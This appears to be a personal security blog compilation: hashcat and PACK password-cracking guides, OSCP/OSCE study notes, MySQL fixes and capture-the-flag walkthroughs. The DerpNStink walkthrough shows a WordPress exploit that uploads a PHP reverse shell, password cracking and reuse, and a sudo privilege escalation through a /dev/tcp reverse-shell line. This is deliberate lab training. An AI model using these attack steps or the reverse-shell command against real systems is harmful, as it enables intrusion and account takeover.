List hardware components with BASH

For troubleshooting purposes you might need to list the hardware components via BASH.

This can be achieved via the following executables.

List all components:
lshw -short

Or individually:

List the installed hard drives (brand, model):
lshw -class disk

View partition info, including RAID:
lsblk

View installed processor:
lscpu

List PCI cards and controllers:
lspci

List the main board brand and model:
dmidecode -t 2

List the network card:
lshw -short | grep network

List RAM modules and capacity:
dmidecode --type 17
See the "Part Number" field and google the code.
Example:
Part Number: CT102464BA160B.C16 -> Crucial

Power supply:
dmidecode --type 39

Sensors information:
apt-get install lm-sensors
sensors-detect
sensors


Analyze wordlists to generate password statistics and hashcat mask files

If you want to analyze wordlists, generate password occurrence statistics and build advanced masks for hashcat from a wordlist or a cracked-hashes file, you need the Password Analysis and Cracking Kit (PACK).

As the author specifies in the manual, PACK (Password Analysis and Cracking Kit) is a collection of utilities developed to aid in the analysis of password attacks by analyzing the common ways in which people create passwords.

To install, use git; if you have Kali, PACK should already be installed and ready to use.

git clone https://gitlab.com/kalilinux/packages/pack.git

Example usage for a wordlist called hashes2.txt:

sudo python ./pack/statsgen.py hashes2.txt --output=hashes2.masks

Generating the hashcat masks file from the hashes2.masks file generated from above:

sudo python ./pack/maskgen.py ./hashes2.masks -o ./hashes1_generated.hcmask --occurrence --pps=100000000

The result of the last command should be a hashcat-compatible hcmask file, which can be used to crack hashes.

Example of a hcmask file:

?l?l?l?l?l?l?l?l
?l?l?l?l?l?l?l?l?l?l
?l?l?l?l?l?l?l?l?l

The syntax for a hashcat mask attack looks like this:

./hashcat.exe -a 3 -m 0 ./hashes1.txt ./masks/hashes2_generated.hcmask -w 3 --status -O
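To see what statsgen and maskgen do under the hood, here is an added Python example (not part of PACK and not code from this post) that derives hashcat masks from a small constructed wordlist, ranks them by occurrence and keeps only those whose keyspace fits a time budget at a given guess rate, the same idea as maskgen's --occurrence and --pps options (the time budget and the charset sizes are assumptions of this example).

```python
import math
import re
from collections import Counter

# Constructed sample wordlist standing in for hashes2.txt (not data from the post).
SAMPLE_WORDLIST = """password
letmein1
Summer2018
P@ssw0rd
qwerty
Welcome1
dragon
abc123
monkey
Summer2019
"""

# Sizes of hashcat's built-in charsets, used to estimate a mask's keyspace.
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33}


def charset_class(ch):
    """Map one character to the hashcat charset token that contains it."""
    if ch.isascii() and ch.islower():
        return "?l"
    if ch.isascii() and ch.isupper():
        return "?u"
    if ch.isascii() and ch.isdigit():
        return "?d"
    return "?s"  # printable specials; non-ASCII is lumped in here for simplicity


def password_mask(pw):
    """Build the mask for a single password, e.g. 'P@ss1' -> '?u?s?l?l?d'."""
    return "".join(charset_class(c) for c in pw)


def mask_stats(wordlist_text):
    """Count each mask in the wordlist; most frequent first, ties broken alphabetically."""
    counts = Counter()
    for line in wordlist_text.splitlines():
        if line:
            counts[password_mask(line)] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def mask_keyspace(mask):
    """Number of candidates a brute-force run of this mask has to try."""
    return math.prod(CHARSET_SIZE[tok] for tok in re.findall(r"\?[luds]", mask))


def select_masks(stats, pps, max_seconds):
    """Keep masks (in occurrence order) whose keyspace can be exhausted within
    max_seconds at pps guesses per second; masks that would never finish are dropped."""
    budget = pps * max_seconds
    return [mask for mask, _count in stats if mask_keyspace(mask) <= budget]


def hcmask_text(wordlist_text, pps=100_000_000, max_seconds=3600):
    """Produce the contents of an .hcmask file: one mask per line, most common first."""
    return "\n".join(select_masks(mask_stats(wordlist_text), pps, max_seconds)) + "\n"


if __name__ == "__main__":
    for mask, count in mask_stats(SAMPLE_WORDLIST):
        print(f"{count:3d}  {mask:28s} keyspace={mask_keyspace(mask):,}")
    print(hcmask_text(SAMPLE_WORDLIST), end="")
```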

Happy cracking!


The skeptic’s OSCP skills requirements guide

It’s been almost one year since I got my OSCP and I never got the chance to write about it. And since almost everyone does a general review about the Offensive Security Certified Professional certification, I decided to do a short write-up about the actual skill requirements for hacking through the OSCP labs and obtaining the OSCP certification.

So what do you need to know prior to starting the OSCP?

  • general OS internals knowledge (Linux, Windows) – have you ever installed Linux/Windows? Do you know what a partition is? What a log is and where to find it?
  • general networking knowledge (what an IP subnet, netmask and gateway are, how packets are routed)
  • troubleshooting skills
  • using a search engine with advanced parameters (filetype, site, inurl, etc.)
  • what ARP, a firewall and an antivirus are
  • can you navigate, list, check or change permissions of files with cmd/bash?
  • can you read simple BASH, Python or PowerShell scripts?
  • can you write two-line scripts in Linux?
  • do you know what this does?

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep "bytes from"; done

Missing some of the above? You can catch up, it’s not rocket science.

What is not mandatory, but great to have?

  • any kind of programming/scripting experience
  • any kind of experience in the IT Security field
  • experience as a sysadmin, tech support engineer or similar background.

Did OSCP help me with finding a job in IT Security?

  • YES!!

Are you ready for Pain & Sufferance? Brace for impact and register for OSCP. You will bleed, but it will change the way you look at IT Security and Pentesting.

Over and out – OS18010


Token length exception – no hashes loaded in hashcat

Trying to crack any kind of hash (SHA1, MD5, etc.) and receiving the "Token length exception – no hashes loaded" error in hashcat?

The easiest way to fix this error is to open the file that contains the hashes in a text editor such as Sublime Text on Linux or Notepad++ on Windows, use the "Save with Encoding" option (Sublime) and choose UTF-8 as the encoding.

This should fix the error and get you underway with your hashcat cracking session, regardless of the hashing algorithm or the attack mode (brute-force, wordlist, etc.).

If this doesn't work, you might have blank spaces at the end of each hash line, so delete those spaces.
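Rather than guessing which line upsets hashcat, it helps to check the file programmatically. The following is an added Python example (not from this post) that strips a UTF-8 BOM, CRLF endings and trailing spaces from a constructed hash file and reports every line whose token length or character set does not match the chosen algorithm; the expected digest lengths for raw MD5 and SHA1 are the only assumptions.

```python
import codecs
import re

# Constructed hash file (not from the post): UTF-8 BOM on line 1, CRLF line endings,
# trailing spaces on line 2, an empty line and stray non-UTF-8 bytes on the last line.
RAW_HASH_FILE = (
    b"\xef\xbb\xbf5f4dcc3b5aa765d61d8327deb882cf99\r\n"
    b"e10adc3949ba59abbe56e057f20f883e   \r\n"
    b"\r\n"
    b"\xff\xfe9b776afb479b31e8047026f1185e952dd1e530cb\n"
)

# Hex digest lengths hashcat expects for raw MD5 (-m 0) and raw SHA1 (-m 100).
EXPECTED_HEX_LEN = {"md5": 32, "sha1": 40}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def clean_hash_file(raw, algo):
    """Return (clean_hashes, problems) for a hashcat input file.

    clean_hashes are lowercase hex digests of the right length for `algo`;
    problems lists each repair or rejection with its line number, so a
    token length error can be traced to a concrete line."""
    expected = EXPECTED_HEX_LEN[algo]
    problems, clean = [], []
    if raw.startswith(codecs.BOM_UTF8):
        problems.append("line 1: UTF-8 BOM removed")
    # utf-8-sig drops the BOM; undecodable bytes become U+FFFD so they get reported below.
    text = raw.decode("utf-8-sig", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped:
            problems.append(f"line {lineno}: empty line skipped")
            continue
        if stripped != line:
            problems.append(f"line {lineno}: surrounding whitespace removed")
        if not HEX_RE.match(stripped):
            problems.append(f"line {lineno}: non-hex characters, line rejected")
            continue
        if len(stripped) != expected:
            problems.append(f"line {lineno}: {len(stripped)} hex chars, expected {expected} for {algo}")
            continue
        clean.append(stripped.lower())
    return clean, problems


def cleaned_text(raw, algo):
    """The text to write back out: no BOM, LF line endings, one hash per line."""
    clean, _ = clean_hash_file(raw, algo)
    return "\n".join(clean) + "\n"


if __name__ == "__main__":
    hashes, issues = clean_hash_file(RAW_HASH_FILE, "md5")
    print("\n".join(issues))
    print(cleaned_text(RAW_HASH_FILE, "md5"), end="")
```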

Happy cracking session!


My OSCE journey

Day 1

I started the research process for my Offensive Security OSCE exam and I selected multiple PDF/web pages that might be useful to me in the preparation process for the Cracking the Perimeter course.

My lab time will start in 5 days and I believe that I am lacking multiple skills/knowledge, like everything related to Assembly, egg hunting and advanced exploit development.

I mainly selected resources from Abatchy's OSCE study plan, converted the web pages to PDF and then joined all the PDFs together using pdfunite.

The result is a 300 page PDF file that will hopefully help me learn and pass the OSCE exam. I couldn't print the PDF on my Xerox printer, so I had to open the file with Adobe Reader and do a "Save as" to fix some errors.

No fancy solution here, but it worked…

Day 2

I printed my 300+ page PDF file and started reading from it. I chose the Assembly part, because I suck at it.

I saw Muts explain how he got a 0day from HP OpenView NNM.

This presentation was actually beautiful and got me thinking that I could actually pull this off (if I sweat enough). If you passed OSCP you will understand more easily what he is doing and why.

Day 3

I received my CTP documentation from Offensive Security and I started to watch the videos.

I had some issues connecting to the VPN, but I got them sorted out: the VPN server had some issues; now it's working.

The first 2 chapters are easy to follow; most of them refer to web exploitation techniques that I encountered in the OSCP.

In the 3rd chapter the stuff begins to be interesting: portable executable stuff, code caves, execution hijacking, etc. This will need to be researched, because this is where you start to encounter more Assembly.

I am beginning to wonder if my short induction to Assembly was enough for my OSCE journey and if I really need to take the SLAE course from SecurityTube.

I also print my PDF from Offsec, because I find it easier to read/learn from paper-printed materials.

A Kindle friendly format would have done the job too, but that option is not available and the CTP PDF is not optimized for the Kindle, so paper is the solution.

Day 4

I am not having the free time I would want and I managed not to study at all for 3-4 days.

I finally managed to go through all the video materials from Offensive Security.

The most accessible chapters seem to be the first two (Web Apps and Web foo) and the last one, chapter 9 – Cisco GRE sniffing.

Having more than 8 years of experience in the Networking/Telecom field, it was actually easy to follow the man-in-the-middle stuff from chapter 9. Unfortunately, I can’t say the same for the advanced buffer overflow stuff – the constant bouncing in the shellcode is difficult to follow at this time. However, I did understand the spike fuzzing part.

After watching the videos, I finally have a clear idea of what I need to do, in order to actually move forward with the Cracking the Perimeter course:

To do:

  1. I actually watched this a couple of months ago, but I need a refresh: Assembly Primer For Hackers (Part 1) System Organization
  2. Corelan SEH buffer overflow tutorial
  3. Start working on the exercises. Write them up in detail, as if I were sending them to Offsec.

Day 5

I am in fuzzer land right now. For my OSCE certification and for some bug bounty related stuff, I decided to look into the fuzzers that people use these days.

Offensive Security recommends the SPIKE fuzzer, but I find it difficult to use, so I started looking into other fuzzers.

Powerfuzzer seems easy to use, but it is unstable. I also used sfuzzer, which seems versatile and easy to use.

I actually tested sfuzzer against my Asus router and I ended up liking it, so I’ll have to decide if I will replace spike with this one, but not sure if it’s the best idea.

</over&out> – for now


Fix Mysql “128 rollback segment(s) are active” and “Waiting for purge to start”

The main problem is not that you receive the error when issuing service mysql status, but that the database is stuck and responds very slowly.

You can get this error after updating the MySQL server to 10.0.x, and it happens because of the InnoDB storage formats: probably the previous MySQL server version used the Barracuda file format and after the update you use the Antelope storage format.

What you want to do is change the format to Barracuda and make this setting global.

The first thing to do is to back up all your databases!

Edit your MySQL configuration file (/etc/mysql/my.cnf or other, depending on the distro) and add:

innodb-rollback-segments=256
innodb_file_format=Barracuda

Save and restart the MySQL process.

Then log in to the MySQL server and issue:

mysql -u admin -p`cat /etc/psa/.psa.shadow`         //for Plesk

mysql -u admin -p         // without Plesk

show variables like "%innodb_file%";

If you see Antelope, then do this:

SET GLOBAL innodb_file_per_table=1;

SET GLOBAL innodb_file_format=Barracuda;

GRANT ALL PRIVILEGES ON yourdb.* TO 'youruser'@'localhost';

FLUSH PRIVILEGES;

Restart MySQL (and do a reboot?).

In the end you should have something like this:

If this doesn’t work, you might want to try THIS first and restart the process described above.


Compress all Mysql tables from a database

db-table-list.txt contains the list of tables from a specific database, exported with:

use somedb;
SHOW TABLES;

And filtered with:

cut -d'|' -f 2 ./db-table-list.txt

Here’s the script:

#!/bin/bash
# Switch every table listed in db-table-list.txt to the compressed row format.
# Blank lines, table borders and the "Tables_in_..." header left over from the
# SHOW TABLES output are skipped.
while read -r tbl; do
  case "$tbl" in ""|+*|Tables_in_*) continue ;; esac
  mysql --user=root \
        --password="suchsecure" \
        --database=somedb \
        --execute="ALTER TABLE \`$tbl\` ROW_FORMAT=Compressed;"
done < ./db-table-list.txt


DerpNStink: 1 walkthrough

Walkthrough of DerpNstink: 1

Enumeration:

root@kali:~# nmap -sT -A -sV --version-intensity 6 -p- 192.168.31.149

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 192.168.31.149

Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-06 06:35 EST
Nmap scan report for 192.168.31.149
Host is up (0.00031s latency).

PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using Metasploit we search for SSH users:

[+] 192.168.31.149:22 – SSH – User ‘gopher’ found
[+] 192.168.31.149:22 – SSH – User ‘kernoops’ found
[+] 192.168.31.149:22 – SSH – User ‘libuuid’ found
[+] 192.168.31.149:22 – SSH – User ‘list’ found
[+] 192.168.31.149:22 – SSH – User ‘listen’ found
[+] 192.168.31.149:22 – SSH – User ‘lp’ found
[+] 192.168.31.149:22 – SSH – User ‘man’ found
[+] 192.168.31.149:22 – SSH – User ‘mountfsys’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody’ found
[+] 192.168.31.149:22 – SSH – User ‘nobody4’ found
[+] 192.168.31.149:22 – SSH – User ‘nuucp’ found
[+] 192.168.31.149:22 – SSH – User ‘sync’ found
[+] 192.168.31.149:22 – SSH – User ‘web’ found
[+] 192.168.31.149:22 – SSH – User ‘webmaster’ found
[+] 192.168.31.149:22 – SSH – User ‘zabbix’ found

Using searchsploit we find an OpenSSH vulnerability that might help identify SSH users:

python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari

[*] Testing SSHD at: 192.168.31.149:22, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host 192.168.31.149 is 0.0631635 seconds.
[*] Baseline variation for host 192.168.31.149 is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

dirb finds some interesting results:

—- Entering directory: http://192.168.31.149/php/ —-
==> DIRECTORY: http://192.168.31.149/php/phpmyadmin/
—- Entering directory: http://192.168.31.149/temporary/ —-
—- Entering directory: http://192.168.31.149/weblog/ —-
==> DIRECTORY: http://192.168.31.149/weblog/wp-admin/

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find http://192.168.31.149/webnotes, which offers some clues:

We try to log in via SSH, but we get trolled:

Another dirb result catches our attention.

http://192.168.31.149/weblog/

This redirects to http://derpnstink.local/weblog/, which we cannot view because DNS resolution fails. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff
192.168.31.149 derpnstink.local
192.168.31.149 www.derpnstink.local
root@kali:~/Desktop/AUTOMATED_actions#

Now we can access the page and it is obviously WordPress, so we fire up wpscan to brute-force some users:

wpscan --url http://derpnstink.local/weblog/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
+—-+————-+———————————+———-+
| Id | Login | Name | Password |
+—-+————-+———————————+———-+
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |
+—-+————-+———————————+———-+

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run https://www.exploit-db.com/exploits/34681/

I copy a PHP reverse shell and run a netcat listener:

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the 34681.py exploit.

python ./34681.py -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

echo $SHELL
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 55 columns 205
reset

We find some users in /etc/passwd:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the SQL user and pass:

/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

Log in to the MySQL server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
SELECT * FROM wp_users;
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
+—-+————-+————————————+—————+——————————+———-+———————+———————————————–+————-+————–+——-+
2 rows in set (0.00 sec)

mysql>

Using hashcat I recover the following passwords for WordPress:

9b776afb479b31e8047026f1185e952dd1e530cb:wedgie57


We find the first flag by logging in to WordPress as unclestinky:

http://derpnstink.local/weblog/?p=8&preview=true

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
cat troubleshooting.txt
*******************************************************************
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?

********************************************************************

********************************************************************
Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at https://pastebin.com/RzK9WfGw if you have any further questions or issues.

Thank you for using our product.

********************************************************************

The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to privesc to user mrderp to execute commands with sudo.

We go to /home:

www-data@DeRPnStiNK:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 12 12:54 .
drwxr-xr-x 23 root root 4.0K Nov 12 13:39 ..
drwx—— 10 mrderp mrderp 4.0K Jan 9 12:15 mrderp
drwx—— 12 stinky stinky 4.0K Jan 9 12:14 stinky

Password reuse?

su stinky
Password: wedgie57

Works!!

We cannot seem to sudo with stinky:

stinky@DeRPnStiNK:/home$ sudo su -l
sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.
stinky@DeRPnStiNK:/home$

Found several SSH private keys; none helped.


Hint:

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd
pwd
/home/stinky/ftp/files/network-logs
stinky@DeRPnStiNK:~/ftp/files/network-logs$

Can't use that because of permissions for tcpdump, but we do find a pcap file in /home/stinky/Documents.

We read it and search for "pass" in the txt file:

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
<ts$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
mrderp@DeRPnStiNK:/home/stinky/Documents$


Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$


mrderp@DeRPnStiNK:~/Downloads$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Downloads$
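The sudo rule above is the whole privilege escalation: a wildcard command path that lives inside the invoking user's own home directory, so the user decides what runs as root. The following is an added Python example (not part of the walkthrough or of any tool on the page) that parses a constructed sudoers excerpt and flags exactly that pattern; the home directory mapping stands in for a getpwnam() lookup and is an assumption.

```python
import re

# Constructed sudoers excerpt (not the machine's real file); the mrderp rule mirrors
# the one quoted in the walkthrough, the other lines are made up for contrast.
SUDOERS_SAMPLE = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL) /home/mrderp/binaries/derpy*
stinky  ALL=(ALL) NOPASSWD: /usr/sbin/tcpdump
%admin  ALL=(ALL) /usr/local/bin/backup.sh, /bin/systemctl restart apache2
"""

# Assumed home directories, standing in for a getpwnam() lookup on the real host.
HOME_DIRS = {"mrderp": "/home/mrderp", "stinky": "/home/stinky"}

# user  host=(runas) [TAG:] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, NOEXEC: ...


def parse_sudoers(text):
    """Parse user specification lines into dicts; Defaults, comments and
    unparsable lines (aliases, includes) are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [TAG_RE.sub("", c.strip()) for c in m.group("cmds").split(",")]
        rules.append({"user": m.group("user"), "runas": m.group("runas") or "", "cmds": cmds})
    return rules


def audit_rule(rule, home_dirs=HOME_DIRS):
    """Findings for one rule: wildcards in the command, commands living under the
    invoking user's own home directory and relative command paths."""
    findings = []
    home = home_dirs.get(rule["user"], "")
    for cmd in rule["cmds"]:
        path = cmd.split()[0]  # ignore argument restrictions after the program
        if path == "ALL":
            continue
        if any(ch in path for ch in "*?["):
            findings.append(f"{rule['user']}: wildcard in sudo command '{cmd}'")
        if home and (path == home or path.startswith(home.rstrip("/") + "/")):
            findings.append(f"{rule['user']}: sudo command '{cmd}' lives inside the user's own home {home}")
        if not path.startswith("/"):
            findings.append(f"{rule['user']}: relative command path '{cmd}'")
    return findings


def audit_sudoers(text, home_dirs=HOME_DIRS):
    """Run audit_rule over every rule in a sudoers text and collect the findings."""
    return [f for rule in parse_sudoers(text) for f in audit_rule(rule, home_dirs)]


if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS_SAMPLE):
        print(finding)
```

On a real host the home-directory check should be extended to "any path component writable by the user" (os.stat on each component), which also catches world-writable directories outside the home.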

We create derpy.sh, add a reverse shell command and start the listener on the local machine:

mrderp@DeRPnStiNK:~/binaries$ echo '#!/bin/bash' >> derpy.sh
echo '#!/bin/bash' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ echo 'bash -i >& /dev/tcp/192.168.31.139/888 0>&1' >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
cat derpy.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.31.139/888 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
sudo ./derpy.sh
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo

root@DeRPnStiNK:/root/Desktop#


Stapler 1 walkthrough.

Stapler 1 vulnerable machine walkthrough.

Firing the recon script returns:

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-27 07:35 EST
Nmap scan report for 192.168.31.147
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| “DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
